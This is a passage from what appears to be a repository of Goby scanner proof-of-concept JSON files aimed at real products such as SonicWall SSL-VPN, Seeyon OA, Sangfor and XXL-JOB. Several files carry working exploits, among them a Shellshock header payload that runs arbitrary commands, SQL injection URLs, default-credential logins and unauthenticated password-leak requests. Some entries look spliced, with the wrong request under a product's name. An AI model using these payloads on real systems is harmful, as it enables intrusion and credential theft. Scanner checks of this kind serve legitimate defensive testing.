SSL-VPN 远程命令执行漏洞", 3 | "Level": "3", 4 | "Tags": [ 5 | "RCE" 6 | ], 7 | "GobyQuery": "(app=\"SonicWALL-Company's-product\" || app=\"SonicWALL-SSL-VPN\")", 8 | "Description": "SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞", 9 | "Product": "SonicWall SSL-VPN", 10 | "Homepage": "https://www.sonicwall.com/", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "Cmd", 21 | "type": "input", 22 | "value": "cat /etc/passwd", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/cgi-bin/jarrewrite.sh", 32 | "follow_redirect": true, 33 | "header": { 34 | "User-Agent": "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" 35 | }, 36 | "data_type": "text", 37 | "data": "" 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | }, 50 | { 51 | "type": "item", 52 | "variable": "$body", 53 | "operation": "contains", 54 | "value": "root", 55 | "bz": "" 56 | } 57 | ] 58 | }, 59 | "SetVariable": [] 60 | } 61 | ], 62 | "ExploitSteps": [ 63 | "AND", 64 | { 65 | "Request": { 66 | "method": "GET", 67 | "uri": "/cgi-bin/jarrewrite.sh", 68 | "follow_redirect": true, 69 | "header": { 70 | "User-Agent": "() { :; }; echo ; /bin/bash -c '{{{Cmd}}}'" 71 | }, 72 | "data_type": "text", 73 | "data": "" 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody" 77 | ] 78 | } 79 | ], 80 | "PostTime": "2021-01-26 15:28:34", 81 | "GobyVersion": "1.8.237" 82 | } -------------------------------------------------------------------------------- /json/U8_OA.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "U8-OA", 3 | "Level": "3", 4 | "Tags": [ 5 | "SQL Injection" 6 | ], 7 | "GobyQuery": "body=\"U8-OA\"", 8 | "Description": "", 9 | "Product": "", 10 | "Homepage": "https://gobies.org/", 11 | "Author": "gobysec@gmail.com", 12 | "Impact": "", 13 | "Recommandation": "undefined
", 14 | "References": [ 15 | "https://gobies.org/" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "c4ca4238a0b923820dcc509a6f75849b", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-25 10:46:03", 52 | "GobyVersion": "1.8.239" 53 | } -------------------------------------------------------------------------------- /json/Wayos AC集中管理系统默认弱口令 CNVD-2021-00876.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Wayos AC集中管理系统默认弱口令 CNVD-2021-00876", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"login_25.jpg\"", 8 | "Description": "深圳维盟科技股份有限公司是国内领先的网络设备及智能家居产品解决方案供应商,主营产品包括无线网关、交换机、国外VPN、双频吸顶ap等。\n\nAC集中管理平台存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。\n弱口令 admin:admin", 9 | "Product": "深圳维盟科技股份有限公司AC集中管理平台", 10 | "Homepage": "http://www.wayos.com/", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/login.cgi", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "user=admin&password=admin" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "not contains", 45 | "value": "flag=0", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-02-07 23:13:20", 54 | "GobyVersion": "1.8.237" 55 | } -------------------------------------------------------------------------------- /json/Wayos_AC_Centralized_management_system_Default_weak_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Wayos AC Centralized management system Default weak password (CNVD-2021-00876)", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default weak password" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"login_25.jpg\"", 8 | "Description": "Shenzhen Weimeng Technology Co., Ltd. is a leading network equipment and smart home product solution provider in China. Its main products include wireless gateway, switch, foreign VPN, dual band top-down AP, etc.\n\n\n\nWeak password vulnerability exists in AC centralized management platform, which can be used by attackers to obtain sensitive information.", 9 | "Product": "Wayos AC Centralized management system", 10 | "Homepage": "http://www.wayos.com/", 11 | "Author": "PeiQi", 12 | "Impact": "An attacker can use this vulnerability to obtain sensitive information.
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "not contains", 43 | "value": "404 Not Found", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "script", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [] 63 | } 64 | ], 65 | "PostTime": "2021-04-10 08:00:20", 66 | "GobyVersion": "1.8.255" 67 | } -------------------------------------------------------------------------------- /json/XXL-JOB 任务调度中心 后台默认弱口令.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "XXL-JOB 任务调度中心 后台默认弱口令", 3 | "Level": "2", 4 | "Tags": [], 5 | "GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "POST", 20 | "uri": "/login", 21 | "follow_redirect": true, 22 | "header": { 23 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" 24 | }, 25 | "data_type": "text", 26 | "data": "userName=admin&password=123456" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 
| "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "500", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [] 56 | } 57 | ], 58 | "PostTime": "2021-03-17 12:24:54", 59 | "GobyVersion": "1.8.237" 60 | } -------------------------------------------------------------------------------- /json/XXL_JOB_Default_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "XXL-JOB Default password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default password" 6 | ], 7 | "GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")", 8 | "Description": "There is a default weak password in the background of xxl-job task scheduling center, so attackers can further attack in the background", 9 | "Product": "XXL-JOB", 10 | "Homepage": "https://www.xuxueli.com/xxl-job/", 11 | "Author": "PeiQi", 12 | "Impact": "Attackers can further attack in the background
undefined
", 14 | "References": [ 15 | "https://gobies.org/" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/?M_id=1'&type=product", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$body", 35 | "operation": "contains", 36 | "value": "mysql", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "Warning", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-06-03 22:27:28", 52 | "GobyVersion": "1.8.268" 53 | } -------------------------------------------------------------------------------- /json/firewall_Leaked_user_name_and_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "防火墙设备账号密码泄露漏洞", 3 | "Level": "3", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5\"", 8 | "Description": "中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台", 9 | "Product": "防火墙", 10 | "Homepage": "https://gobies.org/", 11 | "Author": "gobysec@gmail.com", 12 | "Impact": "", 13 | "Recommandation": "undefined
", 14 | "References": [ 15 | "https://gobies.org/" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$body", 35 | "operation": "contains", 36 | "value": "var dkey_verify = Get_Verify_Info(hex_md5", 37 | "bz": "" 38 | } 39 | ] 40 | }, 41 | "SetVariable": [] 42 | } 43 | ], 44 | "PostTime": "2021-06-01 11:09:54", 45 | "GobyVersion": "1.8.268" 46 | } -------------------------------------------------------------------------------- /json/mallgard.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "mallgard", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "app=\"佑友-佑友防火墙\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "POST", 20 | "uri": "/index.php?c=user&a=ajax_save", 21 | "follow_redirect": true, 22 | "header": { 23 | "Content-type": "text/html; charset=utf-8" 24 | }, 25 | "data_type": "text", 26 | "data": "username=admin&password=hicomadmin&language=zh-cn" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "message", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-21 14:10:45", 52 | "GobyVersion": "1.8.239" 53 | } 
-------------------------------------------------------------------------------- /json/sangfor_Behavior_perception_system_c.php_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "深信服 行为感知系统 c.php 远程命令执行漏洞", 3 | "Level": "3", 4 | "Tags": [ 5 | "RCE" 6 | ], 7 | "GobyQuery": "body=\"isHighPerformance : !!SFIsHighPerformance,\"", 8 | "Description": "深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行", 9 | "Product": "深信服 行为感知系统", 10 | "Homepage": "", 11 | "Author": "peiqi", 12 | "Impact": "", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech/Goby%20&%20POC.html?q=" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/tool/log/c.php?strip_slashes=system&host=ipconfig", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "OR", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "Windows IP", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "IPv6", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [] 56 | } 57 | ], 58 | "PostTime": "2021-06-04 10:11:18", 59 | "GobyVersion": "1.8.268" 60 | } -------------------------------------------------------------------------------- /json/shtermQiZhi_Fortress_Arbitrary_User_Login.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "shterm(QiZhi) Fortress Arbitrary User Login", 3 | "Level": "3", 4 | "Tags": [ 5 | "Any user login" 6 | ], 7 | "GobyQuery": "app=\"shterm-Fortres-Machine\"", 8 | "Description": "Qizhi fortress machine has any user login vulnerability, access to a specific URL can 
obtain backend privileges", 9 | "Product": "shterm(QiZhi) Fortress ", 10 | "Homepage": "shterm.com", 11 | "Author": "PeiQi", 12 | "Impact": "Gain backend privileges
undefined
", 12 | "References": [ 13 | "Internet" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "///Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-03-31 17:37:40", 43 | "GobyVersion": "1.8.237" 44 | } -------------------------------------------------------------------------------- /json/致远OA A6 数据库敏感信息泄露.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "致远OA A6 数据库敏感信息泄露", 3 | "Level": "1", 4 | "Tags": [ 5 | "敏感信息泄露" 6 | ], 7 | "GobyQuery": "(app=\"致远互联-OA\" || app=\"Seeyon-Server\"|| app=\"用友-致远OA\" || (server=\"Seeyon-Server\") || (body=\"/seeyon/USER-DATA/IMAGES/LOGIN/login.gif\" || title=\"用友致远A\" || body=\"/yyoa/\" || header=\"path=/yyoa\" || server==\"SY8044\" || (body=\"A6-V5企业版\" && body=\"seeyon\" && body=\"seeyonProductId\") || (body=\"/seeyon/common/\" && body=\"var _ctxpath = '/seeyon'\") || (body=\"A8-V5企业版\" && body=\"/seeyon/\"))", 8 | "Description": "致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5", 9 | "Product": "致远OA A6", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/createMysql.jsp", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "root", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-03-18 21:36:42", 52 | "GobyVersion": "1.8.237" 53 | } -------------------------------------------------------------------------------- /json/致远OA A6 用户敏感信息泄露.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "致远OA A6 用户敏感信息泄露", 3 | "Level": "2", 4 | "Tags": [ 5 | "信息泄露" 6 | ], 7 | "GobyQuery": "(app=\"致远互联-OA\" || app=\"Seeyon-Server\"|| app=\"用友-致远OA\" || (server=\"Seeyon-Server\") || (body=\"/seeyon/USER-DATA/IMAGES/LOGIN/login.gif\" || title=\"用友致远A\" || body=\"/yyoa/\" || header=\"path=/yyoa\" || server==\"SY8044\" || (body=\"A6-V5企业版\" && body=\"seeyon\" && body=\"seeyonProductId\") || (body=\"/seeyon/common/\" && body=\"var _ctxpath = '/seeyon'\") || (body=\"A8-V5企业版\" && body=\"/seeyon/\"))", 8 | "Description": "致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息\nhttp://xxx.xxx.xxx.xxx/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", 9 | "Product": "致远OA A6", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "@", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-03-18 22:35:46", 52 | "GobyVersion": "1.8.237" 53 | } -------------------------------------------------------------------------------- /json/蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313", 3 | "Level": "2", 4 | "Tags": [ 5 | "账号密码泄露" 6 | ], 7 | "GobyQuery": "(title=\"登录界面\" && app=\"ifw8-Router\")", 8 | "Description": "蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器", 9 | "Product": "蜂网互联企业级路由器v4.31", 10 | "Homepage": "http://www.ifw8.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/action/usermanager.htm", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "pwd", 45 | "bz": "" 46 | } 47 | ] 48 | }, 49 | "SetVariable": [] 50 | } 51 | ], 52 | "ExploitSteps": [ 53 | "AND", 54 | { 55 | "Request": { 56 | "method": "GET", 57 | "uri": "/action/usermanager.htm", 58 | "follow_redirect": true, 59 | "header": {}, 60 | "data_type": "text", 61 | "data": "" 62 | }, 63 | "SetVariable": [ 64 | "output|lastbody" 65 | ] 66 | } 67 | ], 68 | "PostTime": "2021-02-21 11:22:17", 69 | "GobyVersion": "1.8.237" 70 | } --------------------------------------------------------------------------------